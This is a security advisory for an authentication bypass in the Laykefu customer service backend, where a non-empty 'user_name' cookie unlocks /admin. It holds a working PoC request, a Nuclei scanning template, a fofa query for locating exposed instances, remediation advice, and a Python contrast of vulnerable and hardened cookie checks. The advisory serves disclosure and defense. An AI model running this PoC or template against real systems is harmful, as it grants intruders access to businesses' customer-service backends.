Laykefu Customer Service Backend System (customer service backend "green hat" vulnerability)

【Product Introduction】Laykefu is a full-featured WebIM customer service system built on workerman + GatewayWorker + ThinkPHP5, intended to help enterprises manage and deliver customer service effectively.

【Vulnerability Description】When the "user_name" field in the request's Cookie header is non-empty, the backend login check is bypassed. An attacker can exploit this to obtain backend privileges.

【Asset Mapping Query】fofa syntax: icon_hash="-334624619"

【Product Interface】

【Vulnerability Reproduction】

【PoC】

    GET /admin HTTP/2
    Host: 
    Cookie: user_name=1
    Sec-Fetch-Site: none
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Upgrade-Insecure-Requests: 1
    Te: trailers
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Accept-Encoding: gzip, deflate

【Nuclei PoC】

    id: Laykefu-Unauthorized

    info:
      name: Laykefu Unauthorized
      author: admin
      severity: high
      description: description
      reference:
        - https://
      tags: tags

    http:
      - raw:
          - |+
            GET /admin HTTP/2
            Host: {{Hostname}}
            Cookie: user_name=1
            Sec-Fetch-Site: none
            Sec-Fetch-Dest: document
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Upgrade-Insecure-Requests: 1
            Te: trailers
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Accept-Encoding: gzip, deflate

        matchers-condition: and
        matchers:
          - type: binary
            part: body
            binary:
              - e5aea2e69c8d
          - type: status
            status:
              - 200

【Verification】

    .\nuclei -l 1.txt -t 1.yaml

【Remediation Advice】
1. Contact the vendor for a fix.
2. Unless necessary, block public internet access to this system.
3. Restrict access with an allowlist.
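The root cause described above is that the backend treats the mere presence of a client-controlled cookie as proof of login. The following added example (not Laykefu's own code, which is PHP/ThinkPHP5; this is a reconstruction of the pattern in Python) contrasts that check with one that only trusts an HMAC-signed session id that also exists server-side. The secret key and session store are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed for this example: in production the secret comes from configuration
# and the session store is the framework's server-side session backend.
SECRET_KEY = b"constructed-demo-secret-do-not-reuse"
SESSIONS: dict[str, str] = {}  # session id -> logged-in user name


def parse_cookie_header(header: str) -> dict[str, str]:
    """Split a raw Cookie header value into a name -> value map."""
    cookies: dict[str, str] = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def vulnerable_is_admin(cookie_header: str) -> bool:
    """The pattern the advisory describes: any non-empty user_name cookie is trusted.
    Sending 'Cookie: user_name=1' is enough to pass this check."""
    return bool(parse_cookie_header(cookie_header).get("user_name"))


def login(user_name: str) -> str:
    """Create a server-side session after real authentication and return the
    cookie value: '<session id>.<HMAC-SHA256 of the id under SECRET_KEY>'."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = user_name
    sig = hmac.new(SECRET_KEY, sid.encode(), hashlib.sha256).hexdigest()
    return f"{sid}.{sig}"


def hardened_is_admin(cookie_header: str) -> bool:
    """Trust the cookie only if its signature verifies (constant-time compare)
    and the session id was actually issued by the server."""
    token = parse_cookie_header(cookie_header).get("session", "")
    sid, _, sig = token.partition(".")
    if not sid or not sig:
        return False
    expected = hmac.new(SECRET_KEY, sid.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False
    return sid in SESSIONS
```

For reference when reading the Nuclei matcher above, the hex string e5aea2e69c8d is the UTF-8 encoding of "客服" (customer service), i.e. the template matches on that text appearing in a 200 response from /admin.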